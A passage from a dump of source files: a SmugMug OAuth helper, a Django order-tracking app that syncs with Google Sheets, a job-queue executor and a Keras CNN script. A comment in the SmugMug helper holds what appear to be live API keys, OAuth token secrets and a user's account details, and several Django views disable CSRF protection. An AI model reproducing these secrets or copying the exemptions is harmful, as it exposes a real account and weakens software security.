\\w+)/$', 'agregarAmigo'),\n)\n","sub_path":"mensajesInstantaneos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"452780957","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nimport os\nfrom smugpy import SmugMug\nfrom smugphoto.helper.fileutil import FileUtil\n\n\nclass AuthUtil(object):\n def __init__(self, api_key=None, oauth_secret=None, apiKeyDir=None, accessKeyDir=None):\n self.api_key = api_key\n self.oauth_secret = oauth_secret\n self.app_name = 'MySmug'\n self._apiKeyDir = apiKeyDir\n self._accessKeyDir = accessKeyDir\n self.access_token = None\n\n def _smugmugOauthRequestToken(self, access=\"Public\", perm=\"Read\"):\n smugmug = SmugMug(api_key=self.api_key, oauth_secret=self.oauth_secret, app_name=self.app_name)\n\n # Get a token that is short-lived (probably about 5 minutes) and can be used\n # only to setup authorization at SmugMug\n response = smugmug.auth_getRequestToken()\n\n # Get the URL that the user must visit to authorize this app (implicilty includes the request token in the URL)\n url = smugmug.authorize(access=access, perm=perm)\n return url, response['Auth'] # (should contain a 'Token')\n\n @staticmethod\n def _userAuthorizeAtSmugmug(url):\n input(\"Authorize app at %s\\n\\nPress Enter when complete.\\n\" % (url))\n\n def _smugmugOauthGetAccessToken(self, requestToken):\n # Use the request token to log in (which should be authorized now)\n smugmug = SmugMug(api_key=self.api_key, oauth_secret=self.oauth_secret,\n oauth_token=requestToken['Token']['id'],\n oauth_token_secret=requestToken['Token']['Secret'],\n app_name=self.app_name)\n\n # The request token is good for 1 operation: to get an access token.\n response = smugmug.auth_getAccessToken()\n\n # The access token should be good until the user explicitly\n # disables it at smugmug.com in their settings panel.\n return response['Auth']\n\n # Log into smugmug.com with an authorized accessToken. 
The accessToken includes\n    # the user's identity and, effectively, a password to get this application into\n    # the account.\n    def _smugmugOauthUseAccessToken(self, accessToken):\n        # Use the access token to log in\n        smugmug = SmugMug(api_key=self.api_key, oauth_secret=self.oauth_secret,\n                          oauth_token=accessToken['Token']['id'],\n                          oauth_token_secret=accessToken['Token']['Secret'],\n                          app_name=self.app_name)\n        return smugmug\n\n    def getSmug(self):\n        # try to read\n        self._loadAPIKey()\n\n        try:\n            access_token = FileUtil.readYamlToDict(self.accessKeyDir)\n            if access_token is None:\n                access_token = self._tryToGetAccessKeyFromAPIKey()\n        except FileNotFoundError:\n            access_token = self._tryToGetAccessKeyFromAPIKey()\n\n        self.access_token = access_token\n\n        return self._smugmugOauthUseAccessToken(access_token)\n\n\n    def _tryToGetAccessKeyFromAPIKey(self):\n        (url, requestToken) = self._smugmugOauthRequestToken()\n        self._userAuthorizeAtSmugmug(url)\n        access_token = self._smugmugOauthGetAccessToken(requestToken)\n        FileUtil.writeDictToYaml(access_token, self.accessKeyDir)\n\n        return access_token\n\n    def _loadAPIKey(self):\n        keys = FileUtil.readYamlToDict(self.apiKeyDir)\n        self.api_key = keys[\"API Key\"]\n        self.oauth_secret = keys['Oauth Secret']\n        self.app_name = keys[\"App Name\"]\n\n    @property\n    def accessKeyDir(self):\n        if self._accessKeyDir is None:\n            return os.path.abspath(os.path.join(os.getcwd(), r'..\\..\\tests\\auth\\oauth_access.yaml'))\n        else:\n            return os.path.join(os.path.abspath(self._accessKeyDir), r'..\\..\\tests\\auth\\oauth_access.yaml')\n\n    @property\n    def apiKeyDir(self):\n        if self._apiKeyDir is None:\n            return os.path.abspath(os.path.join(os.getcwd(), r'..\\..\\tests\\auth\\keys.yaml'))\n        else:\n            return os.path.join(os.path.abspath(self._apiKeyDir), r'..\\..\\tests\\auth\\keys.yaml')\n\n    # def saveAccessToken(self, accessDict, accessKeyDir=None):\n    #     if accessKeyDir is None:\n    #         filepath = os.path.abspath(os.path.join(os.getcwd(), 'access_key.yaml'))\n    #     else:\n    #         filepath = os.path.join(os.path.abspath(accessKeyDir), 'access_key.yaml')\n    #\n    #     FileUtil.writeDictToYaml(accessDict, filepath)\n    #\n    # def readAccessToken(self, accessKeyDir=None):\n    #     if accessKeyDir is None:\n    #         filepath = os.path.abspath(os.path.join(os.getcwd(), 'access_key.yaml'))\n    #     else:\n    #         filepath = os.path.join(os.path.abspath(accessKeyDir), 'access_key.yaml')\n    #\n    #     return FileUtil.readYamlToDict(filepath)\n\n\nif __name__ == '__main__':\n    # ###\n    # ### Main\n    # ###\n    # API_KEY = \"Ai1WhX5ErNtHYR5YFg4qFAiww6PGZs1d\"\n    # OAUTH_SECRET = \"968d0e37c50b47a2ca04b28da556a8f0\"  # From SmugMug Settings -> Discovery -> API Keys\n    # APP_NAME = \"mySmugTest\"\n    # myAccessToken = {'User': {'Name': 'Huy Le',\n    #                           'URL': 'https://hizzle.smugmug.com',\n    #                           'id': 1813307, 'AccountType': 'Portfolio',\n    #                           'SmugVault': False,\n    #                           'FileSizeLimit': 157286400,\n    #                           'AccountStatus': 'Active',\n    #                           'NickName': 'Hizzle'},\n    #                 'Token': {'Secret': 'e0d8224bcb517f481ebd7a7aca751fe3d34fd657f82e998f2816f1d76424a0b3',\n    #                           'id': '5635a8a6c820780ddf1a5abf13a6a07b',\n    #                           'Access': 'Public',\n    #                           'Permissions': 'Read'}}\n\n    mySmug = AuthUtil().getSmug()\n\n    albums = mySmug.albums_get()\n    for album in albums[\"Albums\"]:\n        print(\"{}, {}\".format(album[\"id\"], album[\"Title\"]))\n","sub_path":"smugphoto/helper/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":6018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"522473212","text":"import datetime\nimport json\nimport os\nimport sys\n\nfrom django.contrib.auth import logout as auth_logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\nfrom django.shortcuts import render, get_list_or_404, redirect\nfrom django.views import generic\nfrom django.views.decorators import csrf\nfrom oauth2client import client\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom distutils.util import strtobool\n\nfrom mysite.settings import PROJECT_ROOT\nfrom .fetch_data import update_database\nfrom .google_manipulation import read_bgColor, sheet_authorization, get_sheet\nfrom .google_manipulation import write_sheet, write_cell\nfrom .models import Customer, Orders\n\n# Create your views here.\n\nINFO_SHIPPED = {\n 'action': 'changeBackgroundColor',\n 'sheetId': 309611827,\n 'startRowIndex': 1835,\n 'endRowIndex': 1836,\n 'startColumnIndex': 10,\n 'endColumnIndex': 11,\n 'red': 0.98823529,\n 'green': 0.89803922,\n 'blue': 0.80392158\n}\n\nINFO_PARTIAL = {\n 'action': 'changeBackgroundColor',\n 'sheetId': 309611827,\n 'startRowIndex': 1835,\n 'endRowIndex': 1836,\n 'startColumnIndex': 10,\n 'endColumnIndex': 11,\n 'red': 0.81568629,\n 'green': 0.87843138,\n 'blue': 0.89019608\n}\n\n\nclass Index(generic.TemplateView):\n template_name = \"kelly/old/index.html\"\n\n\ndef search(request):\n if not request.method == 'POST':\n return render(request, 'kelly/index.html', {\n 'error_message': '你並未輸入任何關鍵字。'\n })\n\n keyword_type = request.POST['keyword_type']\n keyword = request.POST['keyword']\n\n if not keyword or keyword == \"\" or keyword is None:\n return render(request, 'kelly/index.html', {\n 'error_message': '你並未輸入任何關鍵字。'\n })\n\n switch = {\n 'name': select_by_name(keyword),\n 'Facebook': select_by_facebook(keyword),\n 'bank': select_by_bank(keyword),\n 'amount': select_by_amount(keyword),\n 'transfer_date': select_by_transfer_date(keyword),\n 'order': select_by_order(keyword)\n }\n\n result = switch.get(keyword_type, None)\n if not result:\n return render(request, 'kelly/index.html', {\n 'error_message': \"找不到紀錄。\"\n })\n elif result is None:\n return render(request, \"kelly/index.html\", {\n 'error_message': \"找不到紀錄。\"\n })\n else:\n if type(result[0]) == Customer:\n customer = result\n # return HttpResponseRedirect(reverse('kelly:results', kwargs={'customer': customer}))\n return HttpResponseRedirect(reverse('kelly:cus_detail', args=(customer[0].id,)))\n # return render(request, 'kelly/results.html', {'customer': customer})\n else:\n orders = result\n # return HttpResponseRedirect(reverse('kelly:results', kwargs={'customer': customer}))\n return render(request, 'kelly/results.html', {'orders': orders})\n\n\ndef select_by_name(_name):\n try:\n result = get_list_or_404(Customer, customer_name__contains=_name)\n except Http404:\n return False\n return result\n\n\ndef select_by_facebook(_facebook):\n try:\n result = get_list_or_404(Customer, customer_Facebook__contains=_facebook)\n except Http404:\n return False\n return result\n\n\ndef select_by_bank(_bank):\n try:\n result = get_list_or_404(Orders, bank__contains=_bank)\n except Http404:\n return False\n return result\n\n\ndef select_by_amount(_p_amount):\n try:\n _amount = int(_p_amount)\n result = get_list_or_404(Orders, amount=_amount)\n except (Http404, ValueError):\n return False\n return result\n\n\ndef select_by_transfer_date(_p_transfer_date):\n try:\n 
_transfer_date = datetime.datetime.strptime(_p_transfer_date, '%m/%d/%Y')\n result = get_list_or_404(Orders, transfer_date=_transfer_date)\n except (Http404, ValueError):\n return False\n return result\n\n\ndef select_by_order(_order):\n try:\n result = get_list_or_404(Orders, order_content__contains=_order)\n except Http404:\n try:\n result = get_list_or_404(Orders, order_model__contains=_order)\n except Http404:\n return False\n return result\n\n\nclass CustomerDetailView(generic.DetailView):\n model = Customer\n template_name = 'kelly/old/cus_detail.html'\n\n\ndef show_angular(request):\n return render(request, 'kelly/old/angular/index.html')\n\n\ndef js_index(request):\n return render(request, 'kelly/index.html', {'user': request.user})\n\n\ndef js_welcome(request):\n return render(request, 'kelly/welcome.html')\n\n\ndef js_search(request):\n\n if not request.session.get('dataFetched'):\n fetch(request)\n request.session['dataFetched'] = True\n request.session.set_expiry(600)\n\n return render(request, 'kelly/search.html')\n\n\ndef js_control(request):\n return render(request, 'kelly/control.html')\n\n\n@csrf.csrf_protect\ndef ajax_search(request):\n if request.method == 'POST':\n try:\n csrf_str = request.POST.get('csrfmiddlewaretoken', False)\n keyword_type = request.POST.get('keyword_type', False)\n keyword = request.POST.get('keyword', False)\n return render(request, 'kelly/old/ajax_test.html', {'msg': request})\n except:\n e = sys.exc_info()\n return render(request, 'kelly/old/ajax_test.html', {'msg': str(e)})\n else:\n return render(request, 'kelly/old/ajax_test.html')\n\n\n@csrf.csrf_exempt\ndef test_post(request):\n if request.method == 'GET':\n\n order = Orders.objects.all().values()\n\n myDict = dict()\n myList = list()\n\n for _var in order:\n myDict = _var\n realName, faceBook, phone = get_customer_data(_var['customer_id'])\n myDict['customer_name'] = realName\n myDict['customer_Facebook'] = faceBook\n myDict['customer_phone'] = phone\n\n myStr = datetime.datetime.strftime(myDict['transfer_date'], '%Y. %m. 
%d')\n intYear = int(myStr[0:4]) - 1911\n remains = myStr[4:]\n myFinalDate = str(intYear) + remains\n\n myDict['transfer_date'] = myFinalDate\n # myDict['bank'] = str(myDict['bank']).replace('-', ' | ')\n\n myList.append(myDict)\n\n jsonText = json.dumps(myList)\n\n return HttpResponse(jsonText, {'user': request.user})\n\n elif request.method == 'POST':\n\n string = request.body\n string = string.decode('utf-8')\n myDict = json.loads(string)\n\n if myDict['action'] and myDict['action'] == 'shipping':\n\n service_account_access(request)\n\n spreadsheet_service = sheet_authorization(request, use_service=True)\n\n # if not spreadsheet_service:\n # return HttpResponseRedirect(reverse('kelly:oauth2callback'))\n\n order = Orders.objects.get(pk=myDict['id'])\n if myDict.get('isShipped') == 'partial':\n order.isShipped = False\n order.isPartialShipped = True\n else:\n order.isShipped = myDict['isShipped']\n order.isPartialShipped = False\n order.save()\n\n info = None\n values = list()\n _content = list()\n\n if not order.isShipped and order.isPartialShipped:\n info = INFO_PARTIAL\n _content.append('Partial')\n values.append(_content)\n else:\n info = INFO_SHIPPED\n _content.append(str(order.isShipped).upper())\n values.append(_content)\n\n info['startRowIndex'] = order.id + 1834\n info['endRowIndex'] = order.id + 1835\n\n if not order.isShipped and not order.isPartialShipped:\n info['red'], info['green'], info['blue'] = 1.0, 1.0, 1.0\n\n result = write_sheet(spreadsheet_service, 'kelly', info)\n result2 = write_cell(spreadsheet_service, 'kelly',\n range='Form Responses 2!M%i:M%i' % (order.id + 1835, order.id + 1835),\n majorDimension='ROWS',\n values=values)\n\n return HttpResponse('%s %s' % (str(result), str(result2)))\n\n elif myDict['action'] and myDict['action'] == 'update':\n\n service_account_access(request)\n\n spreadsheet_service = sheet_authorization(request, use_service=True)\n\n response = ''\n\n for single_order in myDict['allData']:\n order = Orders.objects.get(pk=single_order['id'])\n affected = 0\n for col in single_order.keys():\n\n try:\n\n if isinstance(getattr(order, col), int) and not isinstance(getattr(order, col), bool):\n\n if getattr(order, col) != int(single_order[col]):\n setattr(order, col, int(single_order[col]))\n affected += 1\n else:\n continue\n\n elif isinstance(getattr(order, col), bool):\n\n if str(single_order[col]) == 'partial' and not order.isPartialShipped:\n order.isPartialShipped = True\n order.isShipped = False\n affected += 1\n else:\n current_status = strtobool(single_order[col]) \\\n if not isinstance(single_order[col], bool) \\\n else single_order[col]\n\n if getattr(order, col) != single_order[col]:\n setattr(order, col, current_status)\n order.isPartialShipped = False\n affected += 1\n else:\n continue\n\n elif isinstance(getattr(order, col), datetime.date):\n\n _strDate = str(int(single_order[col][:3]) + 1911) + single_order[col][3:]\n current_date = datetime.datetime.strptime(_strDate, '%Y. %m. 
%d')\n current_date = datetime.date(current_date.year, current_date.month, current_date.day)\n\n if getattr(order, col) != current_date:\n setattr(order, col, current_date)\n affected += 1\n else:\n continue\n\n else:\n\n if getattr(order, col) != single_order[col]:\n setattr(order, col, single_order[col])\n affected += 1\n else:\n continue\n\n except AttributeError:\n\n customer = order.customer\n\n if isinstance(getattr(customer, col), int) and not isinstance(getattr(customer, col), bool):\n if getattr(customer, col) != int(single_order[col]):\n setattr(customer, col, int(single_order[col]))\n customer.save()\n affected += 1\n else:\n continue\n else:\n if getattr(customer, col) != single_order[col]:\n setattr(customer, col, single_order[col])\n customer.save()\n affected += 1\n else:\n continue\n\n order.save()\n\n if affected > 0:\n\n info = None\n values = list()\n\n _content = [\n order.customer.customer_name,\n order.customer.customer_Facebook,\n order.bank,\n order.last_five,\n order.amount,\n datetime.datetime.strftime(order.transfer_date, '%m/%d/%Y'),\n order.zip_code,\n order.address,\n order.customer.customer_phone,\n order.order_content,\n order.order_model,\n order.isShipped\n ]\n\n if not order.isShipped and order.isPartialShipped:\n info = INFO_PARTIAL\n _content[-1] = 'Partial'\n values.append(_content)\n else:\n info = INFO_SHIPPED\n _content[-1] = (str(order.isShipped).upper())\n values.append(_content)\n\n info['startRowIndex'] = order.id + 1834\n info['endRowIndex'] = order.id + 1835\n\n if not order.isShipped and not order.isPartialShipped:\n info['red'], info['green'], info['blue'] = 1.0, 1.0, 1.0\n\n result = write_sheet(spreadsheet_service, 'kelly', info)\n result2 = write_cell(spreadsheet_service, 'kelly',\n range='Form Responses 2!B%i:M%i' % (order.id + 1835, order.id + 1835),\n majorDimension='ROWS',\n values=values)\n\n response += '%s %s' % (str(result), str(result2))\n\n return HttpResponse(response + ' Success.')\n\n else:\n\n var = ''\n\n for _str in myDict.keys():\n var += '%s: %s' % (_str, string[_str])\n\n return HttpResponse(var)\n\n\ndef get_customer_data(customer_id):\n realName = Customer.objects.get(id=customer_id).customer_name\n faceBook = Customer.objects.get(id=customer_id).customer_Facebook\n phone = Customer.objects.get(id=customer_id).customer_phone\n\n return realName, faceBook, phone\n\n\n@csrf.csrf_exempt\ndef oauth2callback(request):\n scope = 'https://www.googleapis.com/auth/spreadsheets'\n flow = client.flow_from_clientsecrets(os.path.join(PROJECT_ROOT, 'client_secret.json'),\n scope=scope,\n redirect_uri='http://kelly8118.xyz:8080/kelly/oauth2callback/')\n\n if not request.GET.get('code', False):\n auth_uri = flow.step1_get_authorize_url()\n return HttpResponseRedirect(auth_uri)\n else:\n auth_code = request.GET['code']\n credentials = flow.step2_exchange(auth_code)\n request.session['credentials'] = credentials.to_json()\n return HttpResponseRedirect(reverse('kelly:show_data'))\n\n\n@csrf.csrf_exempt\ndef service_account_access(request):\n scopes = 'https://www.googleapis.com/auth/spreadsheets'\n\n credentials = ServiceAccountCredentials.from_json_keyfile_name(\n os.path.join(PROJECT_ROOT, 'My Project-d78da7467a28.json'),\n scopes=scopes)\n request.session['credentials'] = credentials.to_json()\n\n return HttpResponse(request.session['credentials'])\n\n\n@csrf.csrf_exempt\ndef write_data(request):\n spreadsheet_service = sheet_authorization(request)\n\n if not spreadsheet_service:\n return 
HttpResponseRedirect(reverse('kelly:oauth2callback'))\n\n result = get_sheet(spreadsheet_service, 'kelly',\n 'Form Responses 2!K1911:K1915', getValue=False)\n\n sheets = result.get('sheets', [])\n\n if not sheets:\n return HttpResponse('No data found.')\n else:\n output = read_bgColor(sheets, as_string=False, as_255=False)\n return HttpResponse(output)\n\n # if not request.session.get('credentials', False):\n # return HttpResponseRedirect(reverse('kelly:oauth2callback'))\n #\n # credentials = client.OAuth2Credentials.from_json(request.session['credentials'])\n #\n # if credentials.access_token_expired:\n # return HttpResponseRedirect(reverse('kelly:oauth2callback'))\n # else:\n # http_auth = credentials.authorize(httplib2.Http())\n # discoveryUrl = ('https://sheets.googleapis.com/$discovery/rest?'\n # 'version=v4')\n # spreadsheet_service = discovery.build('sheets', 'v4', http=http_auth,\n # discoveryServiceUrl=discoveryUrl)\n # spreadsheetId = '1EKRGi8EmPIO1yUNGuh7L7m9VrDP3YLDYcX6UspM1Lns'\n # rangeName = 'Form Responses 2!K1884:L1885'\n #\n # result = spreadsheet_service.spreadsheets().get(\n # spreadsheetId=spreadsheetId,\n # ranges=rangeName,\n # includeGridData=True).execute()\n # sheets = result.get('sheets', [])\n # output = None\n # if not sheets:\n # return HttpResponse('No data found.')\n # else:\n # # for _sheet in sheets:\n # # _data = _sheet['data'] # A list\n # # for i in _data:\n # # _rowData = i['rowData']\n # # for j in _rowData:\n # # _values = j['values']\n # # for _cellData in _values:\n # # _effectiveFormat = _cellData['effectiveFormat']\n # # _backgroundColor = _effectiveFormat['backgroundColor']\n # # for _key in _backgroundColor.keys():\n # # output += '%s: %s' % (_key, _backgroundColor[_key]) + ' '\n # # output += \"\"\n # output = read_bgColor(sheets, as_string=True, as_255=True)\n # return HttpResponse(output)\n\n\n@csrf.csrf_exempt\ndef write_color(request):\n spreadsheet_service = sheet_authorization(request)\n\n if not spreadsheet_service:\n return HttpResponseRedirect(reverse('kelly:oauth2callback'))\n\n info = {\n 'action': 'changeBackgroundColor',\n 'sheetId': 309611827,\n 'startRowIndex': 1836,\n 'endRowIndex': 1837,\n 'startColumnIndex': 10,\n 'endColumnIndex': 11,\n 'red': 0.81568629,\n 'green': 0.87843138,\n 'blue': 0.89019608\n }\n\n result = write_sheet(spreadsheet_service, 'kelly', info)\n\n return HttpResponse(str(result))\n\n # if not request.session.get('credentials', False):\n # return HttpResponseRedirect(reverse('kelly:oauth2callback'))\n #\n # credentials = client.OAuth2Credentials.from_json(request.session['credentials'])\n #\n # if credentials.access_token_expired:\n # return HttpResponseRedirect(reverse('kelly:oauth2callback'))\n # else:\n # http_auth = credentials.authorize(httplib2.Http())\n # discoveryUrl = ('https://sheets.googleapis.com/$discovery/rest?'\n # 'version=v4')\n # spreadsheet_service = discovery.build('sheets', 'v4', http=http_auth,\n # discoveryServiceUrl=discoveryUrl)\n # spreadsheetId = '1EKRGi8EmPIO1yUNGuh7L7m9VrDP3YLDYcX6UspM1Lns'\n # rangeName = 'Form Responses 2!K1836:K1836'\n # body = {\n # 'requests': [\n # {\n # 'addConditionalFormatRule': {\n # 'rule': {\n # 'ranges': [\n # {\n # 'sheetId': 309611827,\n # 'startRowIndex': 1836,\n # 'endRowIndex': 1837,\n # 'startColumnIndex': 10,\n # 'endColumnIndex': 11\n # }\n # ],\n # 'booleanRule': {\n # 'condition': {\n # 'type': 'NOT_BLANK',\n # 'values': []\n # },\n # 'format': {\n # 'backgroundColor': {\n # 'red': 0.81568629,\n # 'green': 0.87843138,\n # 'blue': 
0.89019608\n # }\n # }\n # }\n # },\n # 'index': 0\n # }\n # }\n # ]\n # }\n #\n # result = spreadsheet_service.spreadsheets()\\\n # .batchUpdate(spreadsheetId=spreadsheetId, body=body).execute()\n # return HttpResponse(str(result))\n\n\n@csrf.csrf_exempt\ndef show_data(request):\n if not check_oauth2(request):\n return redirect(reverse('kelly:oauth2callback'))\n\n spreadsheet_service = sheet_authorization(request)\n\n if not spreadsheet_service:\n return HttpResponseRedirect(reverse('kelly:oauth2callback'))\n\n result = get_sheet(spreadsheet_service, 'kelly', 'Form Responses 2!B1836:M3000')\n\n if not result:\n return HttpResponse('No data found.')\n else:\n output = update_database(result, spreadsheet_service)\n affected, partial, created, error_count = output.get('affected'), \\\n output.get('partial'), \\\n output.get('created'), \\\n output.get('error_count')\n myStr = 'Affected: %r, Created: %r, Partially shipped: %r, Error: %r' % \\\n (affected, created, partial, error_count)\n return HttpResponse(myStr)\n\n # if credentials.access_token_expired:\n # return HttpResponseRedirect(reverse('kelly:oauth2callback'))\n # else:\n # http_auth = credentials.authorize(httplib2.Http())\n # discoveryUrl = ('https://sheets.googleapis.com/$discovery/rest?'\n # 'version=v4')\n # spreadsheet_service = discovery.build('sheets', 'v4', http=http_auth,\n # discoveryServiceUrl=discoveryUrl)\n # spreadsheetId = '1EKRGi8EmPIO1yUNGuh7L7m9VrDP3YLDYcX6UspM1Lns'\n # rangeName = 'Form Responses 2!B1836:M3000'\n #\n # result = spreadsheet_service.spreadsheets().values().get(\n # spreadsheetId=spreadsheetId, range=rangeName).execute()\n # values = result.get('values', [])\n #\n # if not values:\n # return HttpResponse('No data found.')\n # else:\n # orders = Orders.objects.all()\n # index = 0\n # affected = 0\n # error_count = 0\n # created = 0\n # partial = 0\n # myOrder = None\n #\n # for row in values:\n # try:\n # myOrder = orders[index]\n # myOrder.bank = row[2]\n # myOrder.last_five = row[3]\n # myOrder.amount = row[4]\n # myOrder.transfer_date = datetime.datetime.strptime(row[5], '%m/%d/%Y')\n # myOrder.zip_code = row[6]\n # myOrder.address = row[7]\n # myOrder.order_content = row[9]\n # myOrder.order_model = row[10]\n # myOrder.order_belong = row[0]\n # if not find_customer(myOrder.order_belong):\n # customer = Customer()\n # customer.customer_name = myOrder.order_belong\n # customer.customer_Facebook = row[1]\n # customer.customer_phone = row[8]\n # customer.save()\n # myOrder.customer_id = Customer.objects.get(customer_name=myOrder.order_belong).id\n # else:\n # myOrder.customer_id = Customer.objects.get(customer_name=myOrder.order_belong).id\n # try:\n # myOrder.isShipped = strtobool(row[11])\n # except ValueError:\n # if row[11] == 'Partial':\n # myOrder.isShipped = False\n # myOrder.isPartialShipped = True\n # myOrder.save()\n # print('Partially shipped order: %s\\n' % (str(row)))\n # partial += 1\n # affected += 1\n # index += 1\n # continue\n # else:\n # print('Cannot fetch the data: IsShipped. 
Row: %s\\n' % (str(row)))\n # error_count += 1\n # index += 1\n # continue\n # myOrder.save()\n # affected += 1\n # index += 1\n # except IndexError:\n # if not row:\n # break\n # myDate = datetime.datetime.strptime(row[5], '%m/%d/%Y')\n # order = Orders()\n # order.bank = row[2]\n # order.last_five = row[3]\n # order.amount = row[4]\n # order.transfer_date = myDate\n # order.zip_code = row[6]\n # order.address = row[7]\n # order.order_content = row[9]\n # order.order_model = row[10]\n # order.order_belong = row[0]\n # if not find_customer(order.order_belong):\n # customer = Customer()\n # customer.customer_name = order.order_belong\n # customer.customer_Facebook = row[1]\n # customer.customer_phone = row[8]\n # customer.save()\n # order.customer_id = Customer.objects.get(customer_name=order.order_belong).id\n # else:\n # order.customer_id = Customer.objects.get(customer_name=order.order_belong).id\n # try:\n # order.isShipped = strtobool(row[11])\n # except ValueError:\n # if row[11] == 'Partial':\n # order.isShipped = False\n # order.isPartialShipped = True\n # order.save()\n # print('Partially shipped order: %s\\n' % (str(row)))\n # partial += 1\n # created += 1\n # index += 1\n # continue\n # else:\n # print('Cannot fetch the data: IsShipped. Row: %s\\n' % (str(row)))\n # error_count += 1\n # index += 1\n # continue\n # order.save()\n # created += 1\n # index += 1\n # continue\n #\n # myStr = 'Affected: %i, Created: %i, Partially shipped: %i, Error: %i' %\\\n # (affected, created, partial, error_count)\n # return HttpResponse(myStr)\n\n\n@csrf.csrf_exempt\ndef fetch(request):\n service_account_access(request)\n\n spreadsheet_service = sheet_authorization(request, use_service=True)\n\n result = get_sheet(spreadsheet_service, 'kelly', 'Form Responses 2!B1836:M3000')\n\n if not result:\n return HttpResponse('No data found.')\n else:\n output = update_database(result, spreadsheet_service)\n affected, partial, created, error_count = output.get('affected'), \\\n output.get('partial'), \\\n output.get('created'), \\\n output.get('error_count')\n myStr = 'Affected: %r, Created: %r, Partially shipped: %r, Error: %r' % \\\n (affected, created, partial, error_count)\n return HttpResponse(myStr)\n\n\ndef logout(request):\n auth_logout(request)\n return redirect(reverse('kelly:index'))\n\n\ndef check_oauth2(request):\n try:\n check = isinstance(client.OAuth2Credentials.from_json(request.session.get('credentials')),\n client.OAuth2Credentials)\n except ValueError:\n return False\n\n return check\n","sub_path":"kelly/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":29494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"488336604","text":"import os\nimport queue\nfrom concurrent.futures import Future, Executor as FutureExecutor\n\nfrom pympipool import cancel_items_in_queue, RaisingThread\nfrom pysqa.executor.helper import (\n reload_previous_futures,\n find_executed_tasks,\n serialize_funct,\n write_to_file,\n)\n\n\nclass Executor(FutureExecutor):\n def __init__(self, cwd=None, queue_adapter=None, queue_adapter_kwargs=None):\n self._task_queue = queue.Queue()\n self._memory_dict = {}\n self._cache_directory = os.path.abspath(os.path.expanduser(cwd))\n self._queue_adapter = queue_adapter\n reload_previous_futures(\n future_queue=self._task_queue,\n future_dict=self._memory_dict,\n cache_directory=self._cache_directory,\n )\n command = (\n \"python -m pysqa.executor --cores \"\n + str(queue_adapter_kwargs[\"cores\"])\n + \" --path \"\n + str(self._cache_directory)\n )\n self._queue_id = self._queue_adapter.submit_job(\n working_directory=self._cache_directory,\n command=command,\n **queue_adapter_kwargs\n )\n self._process = RaisingThread(\n target=find_executed_tasks,\n kwargs={\n \"future_queue\": self._task_queue,\n \"cache_directory\": self._cache_directory,\n },\n )\n self._process.start()\n\n def submit(self, fn, *args, **kwargs):\n funct_dict = serialize_funct(fn, *args, **kwargs)\n key = list(funct_dict.keys())[0]\n if key not in self._memory_dict.keys():\n self._memory_dict[key] = Future()\n _ = write_to_file(\n funct_dict=funct_dict, state=\"in\", cache_directory=self._cache_directory\n )[0]\n self._task_queue.put({key: self._memory_dict[key]})\n return self._memory_dict[key]\n\n def shutdown(self, wait=True, *, cancel_futures=False):\n if cancel_futures:\n cancel_items_in_queue(que=self._task_queue)\n self._task_queue.put({\"shutdown\": True, \"wait\": wait})\n self._queue_adapter.delete_job(process_id=self._queue_id)\n self._process.join()\n","sub_path":"pysqa/executor/executor.py","file_name":"executor.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"368858235","text":"from __future__ import print_function\n\nimport tensorflow as tf\nfrom PhotoHandler import get_training_set_and_test_set\nfrom PhotoHandler import get_CNN_training_set_and_test_set\nfrom PhotoHandler import CNN_jpg_width\nfrom PhotoHandler import CNN_jpg_height\n\nimport sys\n\ndp1 = float(sys.argv[1])\ndp2 = float(sys.argv[2])\nprint(\"For Dropout_1=%.1f Dropout_2=%.1f\" % (dp1, dp2))\n\n# (x_train, y_train),(x_test, y_test) = get_training_set_and_test_set()\n(x_train, y_train),(x_test, y_test) = get_CNN_training_set_and_test_set()\nx_train, x_test = x_train / 255.0, x_test / 255.0\n\n# model = tf.keras.models.Sequential([\n# tf.keras.layers.Flatten(input_shape=(30000, )),\n# tf.keras.layers.Dense(512, activation=tf.nn.relu),\n# tf.keras.layers.Dropout(0.2),\n# tf.keras.layers.Dense(5, activation=tf.nn.softmax)\n# ])\n\n# CNN Model\nmodel = tf.keras.models.Sequential([\n tf.keras.layers.Conv2D(128, (3, 3), input_shape=(CNN_jpg_width, CNN_jpg_height, 3), activation=tf.nn.relu),\n tf.keras.layers.Conv2D(128, (3, 3), activation=tf.nn.relu),\n tf.keras.layers.MaxPool2D(),\n tf.keras.layers.Dropout(dp1),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(512, activation=tf.nn.relu),\n tf.keras.layers.Dropout(dp2),\n tf.keras.layers.Dense(5, activation=tf.nn.softmax)\n])\n\nmodel.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\nmodel.fit(x_train, y_train, epochs=1)\nmodel.evaluate(x_test, y_test)\nmodel.fit(x_train, y_train, epochs=1)\nmodel.evaluate(x_test, y_test)\nmodel.fit(x_train, y_train, epochs=1)\nmodel.evaluate(x_test, y_test)\nmodel.fit(x_train, y_train, epochs=1)\nmodel.evaluate(x_test, y_test) # ------------------------ BEST: dp1=0.6, dp2=0.6 and acc=0.6081 loss=1.0303\nmodel.fit(x_train, y_train, epochs=1)\nmodel.evaluate(x_test, y_test)","sub_path":"Version/3.0/KerasNetwork.py","file_name":"KerasNetwork.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
